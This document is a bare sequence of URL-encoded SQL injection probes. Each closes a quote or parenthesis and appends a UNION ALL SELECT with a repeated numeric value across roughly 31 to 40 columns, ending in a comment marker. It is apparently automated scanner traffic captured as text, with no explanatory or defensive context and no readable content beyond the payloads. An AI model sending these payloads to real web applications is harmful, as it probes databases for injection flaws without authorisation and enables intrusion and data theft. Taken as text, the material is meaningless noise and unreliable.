-4582%27%29%20UNION%20ALL%20SELECT%204947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947%2C4947--%20 -4708%27%29%20UNION%20ALL%20SELECT%203852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852--%20 -7460%27%29%29%20UNION%20ALL%20SELECT%202133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133%2C2133--%20 -5063%27%29%29%20UNION%20ALL%20SELECT%204127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127--%20 -8893%27%29%29%20UNION%20ALL%20SELECT%202549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549--%20 -6258%27%29%29%20UNION%20ALL%20SELECT%203288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288--%20 -3200%27%29%29%20UNION%20ALL%20SELECT%206905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905--%20 -6626%27%29%29%20UNION%20ALL%20SELECT%205122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122--%20 -5160%27%29%29%20UNION%20ALL%20SELECT%208111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111%2C8111--%20 -5015%27%29%29%20UNION%20ALL%20SELECT%207642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642%2C7642--%20 -1126%27%29%29%20UNION%20ALL%20SELECT%206013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013--%20 -6998%27%29%29%20UNION%20ALL%20SELECT%206675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675--%20 -2373%27%29%29%29%20UNION%20ALL%20SELECT%209085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085%2C9085--%20 -7931%27%29%29%29%20UNION%20ALL%20SELECT%202305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305--%20 -8237%27%29%29%29%20UNION%20ALL%20SELECT%202909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909%2C2909--%20 -6702%27%29%29%29%20UNION%20ALL%20SELECT%203854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854--%20 -8166%27%29%29%29%20UNION%20ALL%20SELECT%208242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242%2C8242--%20 -5414%27%29%29%29%20UNION%20ALL%20SELECT%206201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201--%20 -1552%27%29%29%29%20UNION%20ALL%20SELECT%205146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146--%20 -4360%27%29%29%29%20UNION%20ALL%20SELECT%208409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409--%20 -7117%27%29%29%29%20UNION%20ALL%20SELECT%203858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858%2C3858--%20 -4772%27%29%29%29%20UNION%20ALL%20SELECT%208529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529--%20 -7637%27%20UNION%20ALL%20SELECT%204387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387%2C4387--%20 -9281%27%20UNION%20ALL%20SELECT%209852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852%2C9852--%20 -6165%27%20UNION%20ALL%20SELECT%202609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609%2C2609--%20 -3203%27%20UNION%20ALL%20SELECT%201219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219--%20 -8600%27%20UNION%20ALL%20SELECT%202669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669--%20 -4543%27%20UNION%20ALL%20SELECT%209128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128%2C9128--%20 -8539%27%20UNION%20ALL%20SELECT%206432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432%2C6432--%20 -3571%27%20UNION%20ALL%20SELECT%209069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069%2C9069--%20 -8496%27%20UNION%20ALL%20SELECT%206074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074--%20 -7609%27%20UNION%20ALL%20SELECT%207692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692--%20 -4421%22%29%20UNION%20ALL%20SELECT%204678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678--%20 -4367%22%29%20UNION%20ALL%20SELECT%201514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514%2C1514--%20 -6163%22%29%20UNION%20ALL%20SELECT%202723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723%2C2723--%20 -4189%22%29%20UNION%20ALL%20SELECT%205499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499--%20 -1837%22%29%20UNION%20ALL%20SELECT%201111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111--%20 -2134%22%29%20UNION%20ALL%20SELECT%201350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350%2C1350--%20 -4180%22%29%20UNION%20ALL%20SELECT%206717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717%2C6717--%20 -1186%22%29%20UNION%20ALL%20SELECT%208681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681--%20 -6322%22%29%20UNION%20ALL%20SELECT%201958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958--%20 -5920%22%29%20UNION%20ALL%20SELECT%208439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439--%20 -8521%22%29%29%20UNION%20ALL%20SELECT%203036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036--%20 -9202%22%29%29%20UNION%20ALL%20SELECT%209182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182--%20 -1117%22%29%29%20UNION%20ALL%20SELECT%201241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241--%20 -6987%22%29%29%20UNION%20ALL%20SELECT%207963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963--%20 -1103%22%29%29%20UNION%20ALL%20SELECT%201508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508%2C1508--%20 -1516%22%29%29%20UNION%20ALL%20SELECT%206020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020%2C6020--%20 -9827%22%29%29%20UNION%20ALL%20SELECT%207018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018--%20 -4195%22%29%29%20UNION%20ALL%20SELECT%207186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186--%20 -9196%22%29%29%20UNION%20ALL%20SELECT%201160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160%2C1160--%20 -9076%22%29%29%20UNION%20ALL%20SELECT%206492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492%2C6492--%20 -2450%22%29%29%29%20UNION%20ALL%20SELECT%205756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756--%20 -4322%22%29%29%29%20UNION%20ALL%20SELECT%207329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329--%20 -2654%22%29%29%29%20UNION%20ALL%20SELECT%207440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440--%20 -6267%22%29%29%29%20UNION%20ALL%20SELECT%209267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267--%20 -6368%22%29%29%29%20UNION%20ALL%20SELECT%202851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851--%20 -2490%22%29%29%29%20UNION%20ALL%20SELECT%208143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143%2C8143--%20 -4202%22%29%29%29%20UNION%20ALL%20SELECT%205981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981%2C5981--%20 -4278%22%29%29%29%20UNION%20ALL%20SELECT%201524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524%2C1524--%20 -4587%22%29%29%29%20UNION%20ALL%20SELECT%209811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811--%20 -2347%22%29%29%29%20UNION%20ALL%20SELECT%203664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664%2C3664--%20 -6113%22%20UNION%20ALL%20SELECT%203533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533%2C3533--%20 -9483%22%20UNION%20ALL%20SELECT%206975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975--%20 -9745%22%20UNION%20ALL%20SELECT%209162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162--%20 -5356%22%20UNION%20ALL%20SELECT%208853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853%2C8853--%20 -3708%22%20UNION%20ALL%20SELECT%208130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130--%20 -4361%22%20UNION%20ALL%20SELECT%207557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557%2C7557--%20 -2986%22%20UNION%20ALL%20SELECT%202374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374--%20 -9077%22%20UNION%20ALL%20SELECT%201115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115%2C1115--%20 -8646%22%20UNION%20ALL%20SELECT%208430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430%2C8430--%20 -7032%22%20UNION%20ALL%20SELECT%208313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313--%20 -7052%22%29%20UNION%20ALL%20SELECT%202599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599%2C2599--%20 